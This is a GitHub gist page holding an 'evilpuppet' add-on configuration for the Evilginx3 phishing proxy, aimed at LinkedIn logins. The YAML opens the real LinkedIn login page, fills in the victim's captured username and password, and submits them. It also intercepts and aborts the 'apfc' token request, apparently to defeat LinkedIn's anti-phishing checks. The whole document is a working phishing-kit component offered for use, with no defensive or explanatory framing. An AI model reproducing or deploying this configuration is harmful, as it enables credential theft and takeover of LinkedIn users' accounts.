Skip to content

Instantly share code, notes, and snippets.

@simplerhacking
Created November 22, 2023 12:47
Show Gist options
  • Save simplerhacking/5ed51a94755328d0bad5fd2148dbedd3 to your computer and use it in GitHub Desktop.
Save simplerhacking/5ed51a94755328d0bad5fd2148dbedd3 to your computer and use it in GitHub Desktop.
Evilpuppet Script for Linkedin (Evilginx3)
# evilpuppet add-on for Linkedin
evilpuppet:
triggers:
- domains: ['www.linkedin.com']
paths: ['/checkpoint/lg/login-submit']
token: 'apfc'
open_url: 'https://www.linkedin.com/login'
actions:
- selector: '#username'
value: '{username}'
enter: false
click: false
post_wait: 500
- selector: '#password'
value: '{password}'
enter: false
click: false
post_wait: 500
- selector: 'button[type=submit]'
click: true
post_wait: 1000
interceptors:
- token: 'apfc'
url_re: '/checkpoint/lg/login-submit'
post_re: 'apfc=([^&]*)'
abort: true
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment